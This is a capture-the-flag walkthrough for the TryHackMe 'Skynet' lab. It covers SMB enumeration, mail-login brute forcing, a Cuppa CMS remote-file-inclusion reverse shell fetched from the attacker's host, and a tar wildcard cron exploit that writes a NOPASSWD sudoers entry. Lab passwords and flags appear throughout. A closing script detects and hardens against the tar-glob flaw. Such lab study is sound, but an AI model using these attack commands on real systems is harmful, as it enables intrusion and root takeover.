THM Skynet - grunt92/IT-Sec-WriteUps GitHub Wiki

Deploy and compromise the vulnerable machine!

What is Miles' password for his emails?

Run nmap -A -p- IP to scan all ports of the machine. You will see that the Samba ports of the target are open. Continue the recon part of the task by running gobuster dir --url http://IP -w /path/to/wordlist.txt -t 64. Checking the returned directories, you will find that only the "squirrelmail" directory is accessible and that it requires credentials to log in. To find the credentials, check the Samba ports. Run smbclient -L \\\\IP and enter nothing as the password. You will find an anonymous share. Run smbclient //IP/anonymous (again with an empty password) and you get access to the share. Check the files in the share and in the log directory. The "log1.txt" file contains a list of random words. Going to the squirrelmail directory on the server, we can use this list as a password list against the login form. By doing so we get the password of milesdyson.

cyborg007haloterminator

What is the hidden directory?

Check the mails of milesdyson and you will find a password-reset mail containing a new password. With this information we can log in to Miles' SMB share by running smbclient -U milesdyson //IP/milesdyson. After logging in to the share you can search through it and you will find a single text file called "important.txt". In this file we will find the mention of a single directory.

/45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

Remote File Inclusion

What is the user flag?

Go to the newly found directory. From there run gobuster to check for more directories. You will find an "administrator" login that uses "Cuppa CMS". Search for "Cuppa CMS" on exploit-db and you will find an exploit. To use the exploit, request "http://IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=PARAMETER". Instead of "PARAMETER" we can enter local paths or URLs. Download a PHP reverse shell. Start the listener on your device. Start a web server on your device and enter "http://YOUR_IP:PORT/shell.php" instead of PARAMETER to start the shell. Once the shell is established, run cat /home/milesdyson/user.txt to get the flag.

7ce5c2109a40f958099283600a9ae807

What is the root flag?

Check your sudo privileges by running sudo -l. You will see that there are no sudo privileges for your current user. In the home directory of milesdyson you will see that there is a backup directory. In that directory there is a backup.sh file. Running cat backup.sh shows that the script compresses the content of the "/var/www/html" directory into the backup.tgz file. This looks like a cron job. By running cat /etc/crontab we confirm that the script is executed every minute by root. Unfortunately we cannot change the content of the script file, but GTFOBins shows that tar can spawn a shell when run with specific parameters, and because the script hands tar a shell wildcard, file names in /var/www/html are expanded into tar arguments. We can use this in combination with the cron job to gain access to the root user. To do so change the directory to "/var/www/html". There you can run echo 'echo "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > sudo.sh, touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh" and touch "/var/www/html/--checkpoint=1". Once the cron job has run again (within a minute), run sudo su to become root. Run cat /root/root.txt and get the flag.

3f0372db24753accc7179a282cd6a949
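As an added example (not part of this write-up), a small shell script a defender could run against a box like this one: it flags a backup script that lets tar expand a shell glob, lists option-like file names in the backed-up directory, and shows the glob-free tar invocation that makes such names harmless. The sample script text and paths are constructed stand-ins for the box's backup.sh, not copied from it.

```shell
#!/bin/sh
# Added example, not part of the write-up: defensive checks for the cron
# backup pattern described above. Paths and the sample script are
# constructed placeholders, not copied from the box.

# Exit 0 if the given script passes a shell glob to tar (e.g. "tar cf x.tgz *").
# The glob is the problem: it turns file names in the backed-up directory into
# tar arguments, so anyone who can write there can smuggle in tar options.
script_globs_into_tar() {
    grep -qE 'tar[[:space:]][^#]*[[:space:]]\*' "$1"
}

# Print every top-level entry of a directory whose name starts with '-'.
# Such names only make sense as option injection against a glob; exit 0 if
# any were found and 1 otherwise, so the check can drive an alert.
find_option_like_names() {
    found=1
    for f in "$1"/-*; do
        [ -e "$f" ] || continue
        basename "$f"
        found=0
    done
    return $found
}

# Hardened invocation: no glob at all. "-C dir ." archives the directory
# contents as literal member names, and "--" ends option parsing, so a file
# called "--checkpoint=1" is just data inside the archive.
safe_backup() {
    tar -czf "$2" -C "$1" -- .
}

# Stand-alone demo on a constructed directory: sh this_script.sh demo
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)
    : > "$d/index.html"; : > "$d/--checkpoint=1"
    printf 'cd %s\ntar cf /tmp/backup.tgz *\n' "$d" > "$d.sh"
    script_globs_into_tar "$d.sh" && echo "backup script globs into tar"
    find_option_like_names "$d" && echo "option-like names found above"
    safe_backup "$d" "$d.tgz" && tar -tzf "$d.tgz"
fi
```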